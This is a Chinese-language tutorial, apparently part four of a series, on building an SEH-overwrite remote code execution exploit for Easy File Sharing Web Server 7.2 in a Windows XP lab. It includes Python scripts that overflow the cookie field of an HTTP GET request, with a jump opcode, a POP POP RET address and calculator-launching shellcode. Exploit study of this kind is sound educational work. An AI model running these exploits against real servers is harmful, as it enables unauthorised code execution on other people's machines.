<!DOCTYPE html>
<html>
<head>
<title>Windows漏洞利用开发教程 Part 4：SEH</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<style type="text/css">
/* GitHub stylesheet for MarkdownPad (http://markdownpad.com) */
/* Author: Nicolas Hery - http://nicolashery.com */
/* Version: b13fe65ca28d2e568c6ed5d7f06581183df8f2ff */
/* Source: https://github.com/nicolahery/markdownpad-github */

/* RESET
=============================================================================*/

html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, big, cite, code, del, dfn, em, img, ins, kbd, q, s, samp, small, strike, strong, sub, sup, tt, var, b, u, i, center, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td, article, aside, canvas, details, embed, figure, figcaption, footer, header, hgroup, menu, nav, output, ruby, section, summary, time, mark, audio, video {
  margin: 0;
  padding: 0;
  border: 0;
}

/* BODY
=============================================================================*/

body {
  font-family: Helvetica, arial, freesans, clean, sans-serif;
  font-size: 14px;
  line-height: 1.6;
  color: #333;
  background-color: #fff;
  padding: 20px;
  max-width: 960px;
  margin: 0 auto;
}

body>*:first-child {
  margin-top: 0 !important;
}

body>*:last-child {
  margin-bottom: 0 !important;
}

/* BLOCKS
=============================================================================*/

p, blockquote, ul, ol, dl, table, pre {
  margin: 15px 0;
}

/* HEADERS
=============================================================================*/

h1, h2, h3, h4, h5, h6 {
  margin: 20px 0 10px;
  padding: 0;
  font-weight: bold;
  -webkit-font-smoothing: antialiased;
}

h1 tt, h1 code, h2 tt, h2 code, h3 tt, h3 code, h4 tt, h4 code, h5 tt, h5 code, h6 tt, h6 code {
  font-size: inherit;
}

h1 {
  font-size: 28px;
  color: #000;
}

h2 {
  font-size: 24px;
  border-bottom: 1px solid #ccc;
  color: #000;
}

h3 {
  font-size: 18px;
}

h4 {
  font-size: 16px;
}

h5 {
  font-size: 14px;
}

h6 {
  color: #777;
  font-size: 14px;
}

body>h2:first-child, body>h1:first-child, body>h1:first-child+h2, body>h3:first-child, body>h4:first-child, body>h5:first-child, body>h6:first-child {
  margin-top: 0;
  padding-top: 0;
}

a:first-child h1, a:first-child h2, a:first-child h3, a:first-child h4, a:first-child h5, a:first-child h6 {
  margin-top: 0;
  padding-top: 0;
}

h1+p, h2+p, h3+p, h4+p, h5+p, h6+p {
  margin-top: 10px;
}

/* LINKS
=============================================================================*/

a {
  color: #4183C4;
  text-decoration: none;
}

a:hover {
  text-decoration: underline;
}

/* LISTS
=============================================================================*/

ul, ol {
  padding-left: 30px;
}

ul li > :first-child, 
ol li > :first-child, 
ul li ul:first-of-type, 
ol li ol:first-of-type, 
ul li ol:first-of-type, 
ol li ul:first-of-type {
  margin-top: 0px;
}

ul ul, ul ol, ol ol, ol ul {
  margin-bottom: 0;
}

dl {
  padding: 0;
}

dl dt {
  font-size: 14px;
  font-weight: bold;
  font-style: italic;
  padding: 0;
  margin: 15px 0 5px;
}

dl dt:first-child {
  padding: 0;
}

dl dt>:first-child {
  margin-top: 0px;
}

dl dt>:last-child {
  margin-bottom: 0px;
}

dl dd {
  margin: 0 0 15px;
  padding: 0 15px;
}

dl dd>:first-child {
  margin-top: 0px;
}

dl dd>:last-child {
  margin-bottom: 0px;
}

/* CODE
=============================================================================*/

pre, code, tt {
  font-size: 12px;
  font-family: Consolas, "Liberation Mono", Courier, monospace;
}

code, tt {
  margin: 0 0px;
  padding: 0px 0px;
  white-space: nowrap;
  border: 1px solid #eaeaea;
  background-color: #f8f8f8;
  border-radius: 3px;
}

pre>code {
  margin: 0;
  padding: 0;
  white-space: pre;
  border: none;
  background: transparent;
}

pre {
  background-color: #f8f8f8;
  border: 1px solid #ccc;
  font-size: 13px;
  line-height: 19px;
  overflow: auto;
  padding: 6px 10px;
  border-radius: 3px;
}

pre code, pre tt {
  background-color: transparent;
  border: none;
}

kbd {
    -moz-border-bottom-colors: none;
    -moz-border-left-colors: none;
    -moz-border-right-colors: none;
    -moz-border-top-colors: none;
    background-color: #DDDDDD;
    background-image: linear-gradient(#F1F1F1, #DDDDDD);
    background-repeat: repeat-x;
    border-color: #DDDDDD #CCCCCC #CCCCCC #DDDDDD;
    border-image: none;
    border-radius: 2px 2px 2px 2px;
    border-style: solid;
    border-width: 1px;
    font-family: "Helvetica Neue",Helvetica,Arial,sans-serif;
    line-height: 10px;
    padding: 1px 4px;
}

/* QUOTES
=============================================================================*/

blockquote {
  border-left: 4px solid #DDD;
  padding: 0 15px;
  color: #777;
}

blockquote>:first-child {
  margin-top: 0px;
}

blockquote>:last-child {
  margin-bottom: 0px;
}

/* HORIZONTAL RULES
=============================================================================*/

hr {
  clear: both;
  margin: 15px 0;
  height: 0px;
  overflow: hidden;
  border: none;
  background: transparent;
  border-bottom: 4px solid #ddd;
  padding: 0;
}

/* TABLES
=============================================================================*/

table th {
  font-weight: bold;
}

table th, table td {
  border: 1px solid #ccc;
  padding: 6px 13px;
}

table tr {
  border-top: 1px solid #ccc;
  background-color: #fff;
}

table tr:nth-child(2n) {
  background-color: #f8f8f8;
}

/* IMAGES
=============================================================================*/

img {
  max-width: 100%
}
</style>
</head>
<body>
<h3>Windows漏洞利用开发教程 Part 4：SEH</h3>
<h3>Author：zusheng</h3>
<h3>Link：<a href="http://www.isbase.cc">http://www.isbase.cc</a></h3>
<p><image src="image/p1.jpg" /></p>
<h2>0x01 前言</h2>
<p>漏洞-信息安全界最常见的词汇，在百度百科是这样描述的。</p>
<p>漏洞是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷，从而可以使攻击者能够在未授权的情况下访问或破坏系统。</p>
<p>本文主要介绍的是Windows软件漏洞的利用开发教程。</p>
<p>我花了大量的时间来研究了计算机安全领域Windows漏洞利用开发，希望能和大家分享一下，能帮助到对这方面感兴趣的朋友，如有不足，还请见谅。</p>
<h2>0x02 准备阶段</h2>
<p>欢迎阅读本系列文章的第四部分，如果你错过了第三部分，请点击下方传送门。</p>
<p>http://www.freebuf.com/articles/system/169167.html</p>
<p>我们需要准备以下工具：</p>
<pre><code>1、Windows XP SP3 32-bit系统iso镜像

2、Immunity Debugger-漏洞分析专用调试器

3、代码文本编辑器（个人喜好，我用的是notepad++）

4、Easy File Sharing Web Server 7.2
</code></pre>

<p>Easy File Sharing  Web Server 是允许访客容易地经由浏览器上传/下载文件的文件分享系统。你可以从下面链接中下载到存在漏洞的程序。</p>
<pre><code>https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe
</code></pre>

<p>漏洞披露地址：</p>
<pre><code>https://www.exploit-db.com/exploits/42261/
</code></pre>

<p>在这篇文章中，我们将研究覆盖SEH漏洞，也是本系列文章第一次介绍远程代码执行，之前我们研究的都是本地溢出漏洞。在这里，我们将研究如何覆盖Windows中的结构化异常处理程序SEH从而执行任意代码。</p>
<h3>SEH概述</h3>
<p>SEH即Windows结构化异常处理程序，Windows需要它运行的软件从发生的错误中恢复，所以它允许开发人员指定当程序遇到问题时的情况，然后处理程序运行，换句话说，Windows为开发人员提供了一种结构化的方式来处理异常。</p>
<p>结构化异常处理（SEH）是一种用于处理硬件和软件异常的Windows机制，熟悉编程的人可能熟悉异常处理结构。它通常表示为try/except和try/catch代码块。</p>
<p>C/C++（以下代码来自微软MSDN）：</p>
<pre><code>__try {
// the block of code to try (aka the &quot;guarded body&quot;)
...
}
__except (exception filter) {
// the code to run in the event of an exception (aka the &quot;exception handler)
...
}
</code></pre>

<p>这个概念非常简单，尝试执行一段代码，如果发生错误或异常，即执行except块（又名异常处理程序），异常处理程序只不过是告诉系统在发生异常时该怎么做的另一个代码块。</p>
<h2>0x03 漏洞利用开发分析</h2>
<p>了解完SEH概念，我们将存在漏洞的程序在虚拟机中安装。</p>
<p><image src="image/p2.png" /></p>
<p>在Immunity Debugger中打开，然后点击运行。</p>
<p><image src="image/p3.png" /></p>
<p>会出现一个注册对话框，我们点击Try it!</p>
<p><image src="image/p4.png" /></p>
<h3>确认漏洞</h3>
<p>我们需要通过快速验证脚本来确认该漏洞。 阅读下面的Python脚本:</p>
<pre><code># -*- coding: UTF-8 -*-

import socket
import os
import time
import sys

# 目标IP地址
host = &quot;192.168.17.134&quot;
# 端口
port = 80

# 建立缓冲区
buf = &quot;/.:/&quot;        # 不常见，但必须
buf += &quot;A&quot; * 3000   # 测试字符串

# 定制HTTP GET请求
request = &quot;GET /vfolder.ghp HTTP/1.1\r\n&quot;
request += &quot;Host: &quot; + host + &quot;\r\n&quot;
request += &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36&quot; + &quot;\r\n&quot;
request += &quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8&quot; + &quot;\r\n&quot;
request += &quot;Accept-Language: en-US,en;q=0.5&quot; + &quot;\r\n&quot;
request += &quot;Accept-Encoding: gzip, deflate&quot; + &quot;\r\n&quot;
request += &quot;Referer: &quot; + &quot;http://&quot; + host + &quot;/&quot; + &quot;\r\n&quot;
request += &quot;frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; UserID=PassWD=&quot; + buf + &quot;; SESSIONID=27263&quot; # 插入payload
request += &quot;\r\n&quot;
request += &quot;Connection: keep-alive&quot; + &quot;\r\n&quot;
request += &quot;If-Modified-Since: Fri, 04 May 2018 05:07:19 GMT&quot; + &quot;\r\n&quot;

print &quot;[*] Connecting to target: &quot; + host

# 设置socket连接
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 连接
connect = s.connect((host, port))

# 发送payload
s.send(request + &quot;\r\n\r\n&quot;)
# 关闭socket
s.close()
</code></pre>

<p>HTTP GET请求：</p>
<p><image src="image/p5.png" /></p>
<p>我们上面的脚本是将3000个A字符放入HTTP GET请求的cookie部分，然后将其发送到Easy File Sharing Web Server。 它无法正确解析GET请求，导致缓冲区溢出并造成服务器崩溃。</p>
<p>运行脚本，程序会发生中断，你应该看到的是EAX寄存器中熟悉的0x41414141。你可以在菜单选择View-&gt;SEH chain，你会发现它已经被覆盖！这意味着我们可以控制部分SEH链。</p>
<p><image src="image/p6.png" /></p>
<h3>SEH offset</h3>
<p>现在我们需要找到SEH的偏移量来控制SEH chain，我们可以使用mona命令。</p>
<p>生成3000个测试字符</p>
<pre><code>!mona pattern_create 3000
</code></pre>

<p>运行完在C:\logs\fsws\pattern.txt中找到。</p>
<p><image src="image/p7.png" /></p>
<p>重启程序，将其加入到脚本中的buf中运行</p>
<p>使用Mona命令来寻找SEH偏移量</p>
<pre><code>!mona findmsp
</code></pre>

<p>查看Mona的控制台输出，找到它描述SEH偏移量的部分，从图中可以知道53字节可以覆盖到SEH</p>
<p><image src="image/p8.png" /></p>
<p>现在我们需要一些东西来覆盖它。为了使SEH覆盖漏洞起作用，我们需要有几个字节的汇编操作码指令，这些指令将跳转到我们的shellcode以及带有POP POP RET的代码段的地址，为了执行这些指令，操作码指令将被放置在下一个SEH部分，并且POP POP RET指针将被放入SEH部分。</p>
<h3>获取操作码指令和POP POP RET地址</h3>
<p>要获得操作码指令，我们可以参考x86程序集（0xEB）中JMP使用的操作码，然后将20转换为十六进制（0x14）以获取我们将跳转的字节数。我们还会在指令中添加0x90。整个操作码如下所示：</p>
<pre><code>eb 14 90 90
</code></pre>

<p>接下来我们需要找到那个POP POP RET代码块地址。要找到它，可以使用Mona命令：</p>
<pre><code>!mona seh
</code></pre>

<p>打开seh.txt日志查找指向POP POP RET序列的代码块地址。理想情况下，我们需要一个驻留在应用程序本身文件中的代码段。这将使得漏洞利用更加便携，并且减少对个人Windows操作系统的依赖。</p>
<p><image src="image/p9.png" /></p>
<p>现在我们使用模拟的INT shellcode来测试一下。</p>
<h3>模拟测试</h3>
<pre><code># -*- coding: UTF-8 -*-

import socket
import os
import time
import sys

# 目标IP地址
host = &quot;192.168.17.134&quot;
# 端口
port = 80

# 建立缓冲区
padding = &quot;/.:/&quot;        # 不常见，但必须
padding += &quot;A&quot; * 53     # SEH偏移

nseh = &quot;\xeb\x14\x90\x90&quot;   #nseh覆盖-&gt;jmp 20个字节还有2个nop
seh = &quot;\x58\x88\x01\x10&quot;    #覆盖seh

nops = &quot;\x90&quot;*20    # 20字节nop,确保跳转成功落地

# shellcode

shellcode = &quot;\xCC&quot; * 32 

# 构建exploit
exploit = padding
exploit += nseh
exploit += seh
exploit += nops
exploit += shellcode

fill = &quot;\x43&quot; * (3000-len(exploit)) #确保崩溃溢出发生
payload = exploit + fill   

# 定制HTTP GET请求
request = &quot;GET /vfolder.ghp HTTP/1.1\r\n&quot;
request += &quot;Host: &quot; + host + &quot;\r\n&quot;
request += &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36&quot; + &quot;\r\n&quot;
request += &quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8&quot; + &quot;\r\n&quot;
request += &quot;Accept-Language: en-US,en;q=0.5&quot; + &quot;\r\n&quot;
request += &quot;Accept-Encoding: gzip, deflate&quot; + &quot;\r\n&quot;
request += &quot;Referer: &quot; + &quot;http://&quot; + host + &quot;/&quot; + &quot;\r\n&quot;
request += &quot;frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; UserID=PassWD=&quot; + payload + &quot;; SESSIONID=27263&quot; # 插入payload
request += &quot;\r\n&quot;
request += &quot;Connection: keep-alive&quot; + &quot;\r\n&quot;
request += &quot;If-Modified-Since: Fri, 04 May 2018 05:07:19 GMT&quot; + &quot;\r\n&quot;

print &quot;[*] Connecting to target: &quot; + host

# 设置socket连接
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

# 连接
connect = s.connect((host, port))

# 发送payload
s.send(request + &quot;\r\n\r\n&quot;)
# 关闭socket
s.close()
</code></pre>

<p>现在我们来解释一下脚本中的几个关键变量：</p>
<p>nseh：代表“下一个SEH”，它通常指向链中的下一个处理程序，但我们用在x86程序集中jmp 0x20的操作码覆盖它。</p>
<p>seh：指向发生错误时运行的代码段，我们用指向POP POP RET代码块的地址覆盖它，以便我们可以执行驻留在上一个SEH中的跳转代码。</p>
<p>漏洞利用的关键在于自定义的SEH和跳转操作码，我们使用指向POP POP RET的地址覆盖下一个SEH指针，这会从堆栈帧中弹出两条指令并返回到我们的跳转操作码，导致我们添加的shellcode代码被执行。</p>
<p>使用Immunity Debugger运行程序，然后运行我们的脚本，当然程序会暂停，使用shift+F9，你可以看见shellcode得到执行。</p>
<p><image src="image/p10.png" /></p>
<h2>0x04 漏洞利用开发</h2>
<p>经过上面的分析，现在整个开发就很简单了，只需要将shellcode修改一下就好了，我们来更新一下python脚本，放入打开计算器的shellcode。</p>
<pre><code># -*- coding: UTF-8 -*-

import socket
import os
import time
import sys

# 目标IP地址
host = &quot;192.168.17.134&quot;
# 端口
port = 80

# 建立缓冲区
padding = &quot;/.:/&quot;        # 不常见，但必须
padding += &quot;A&quot; * 53     # SEH偏移

nseh = &quot;\xeb\x14\x90\x90&quot;   #nseh覆盖-&gt;jmp 20个字节还有2个nop
seh = &quot;\x58\x88\x01\x10&quot;    #覆盖seh

nops = &quot;\x90&quot;*20    # 20字节nop,确保跳转成功落地

# 计算器shellcode
shellcode = &quot;\x31\xC9&quot;# xor ecx,ecx
shellcode += &quot;\x51&quot;           # push ecx
shellcode += &quot;\x68\x63\x61\x6C\x63&quot;# push 0x636c6163
shellcode += &quot;\x54&quot;# push dword ptr esp
shellcode += &quot;\xB8\x0D\x25\x86\x7C&quot;# mov eax,0x7c86250D
shellcode += &quot;\xFF\xD0&quot;# call eax

# 构建exploit
exploit = padding
exploit += nseh
exploit += seh
exploit += nops
exploit += shellcode

fill = &quot;\x43&quot; * (3000-len(exploit)) #确保崩溃溢出发生
payload = exploit + fill   

# 定制HTTP GET请求
request = &quot;GET /vfolder.ghp HTTP/1.1\r\n&quot;
request += &quot;Host: &quot; + host + &quot;\r\n&quot;
request += &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36&quot; + &quot;\r\n&quot;
request += &quot;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8&quot; + &quot;\r\n&quot;
request += &quot;Accept-Language: en-US,en;q=0.5&quot; + &quot;\r\n&quot;
request += &quot;Accept-Encoding: gzip, deflate&quot; + &quot;\r\n&quot;
request += &quot;Referer: &quot; + &quot;http://&quot; + host + &quot;/&quot; + &quot;\r\n&quot;
request += &quot;frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; UserID=PassWD=&quot; + payload + &quot;; SESSIONID=27263&quot; # 插入payload
request += &quot;\r\n&quot;
request += &quot;Connection: keep-alive&quot; + &quot;\r\n&quot;
request += &quot;If-Modified-Since: Fri, 04 May 2018 05:07:19 GMT&quot; + &quot;\r\n&quot;

print &quot;[*] Connecting to target: &quot; + host
# 设置socket连接
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 连接
connect = s.connect((host, port))
# 发送payload
s.send(request + &quot;\r\n\r\n&quot;)
# 关闭socket
s.close()
</code></pre>

<p>这里为了体现远程代码执行，我并没有在目标机上运行脚本，只是运行了存在漏洞的软件。在另一个计算机我们运行脚本后，目标机器成功弹出计算器。</p>
<p><image src="image/p11.png" /></p>
<h2>0x05 总结</h2>
<p>软件有时候会引入一些功能，表面上看来这些功能很正常，也确实方便了，但是经过仔细分析，这些功能可能就会变成攻击媒介。从中学习我发现操作系统确实很有趣，当然，我自认为自己了解还是太少了。还是那句话，本人水平有限，如有不足，还请各位兄弟指出。</p>

</body>
</html>
<!-- This document was created with MarkdownPad, the Markdown editor for Windows (http://markdownpad.com) -->
